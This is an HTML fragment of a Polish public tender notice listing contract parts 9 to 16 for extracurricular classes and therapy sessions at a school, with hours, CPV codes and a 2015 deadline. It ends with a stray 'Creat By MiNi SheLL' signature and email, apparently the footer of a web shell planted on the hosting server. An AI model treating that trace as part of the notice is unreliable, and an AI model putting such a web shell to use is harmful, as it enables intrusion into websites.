<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dodatkowe zajęcia pozalekcyjne i pozaszkolne z informatyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli:  1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 38 godz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dodatkowe zajęcia pozalekcyjne i pozaszkolne z języka angielskiego English Masters Club.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli:  2
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 168 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dodatkowe zajęcia pozalekcyjne i pozaszkolne z przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli:  1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015:  96 godz.
- liczba wymaganych tłumaczy języka migowego: 1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 40 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Doradztwo i opieka pedagogiczno-psychologiczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli:  2
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 88 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zajęcia w ramach terapii artystycznej - teoretyczne i praktyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli:  2 nauczycieli
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 192 godz.,
- liczba wymaganych instruktorów:  1 instruktor + 1 tłumacz języka migowego
- ilość godzin lekcyjnych do zrealizowania:  240 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zajęcia w ramach terapii ruchowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli: 1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 144 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zajęcia w ramach terapii teatralno - muzycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli: 2
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015:  382 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Doradztwo edukacyjno - zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli:  1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 120 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com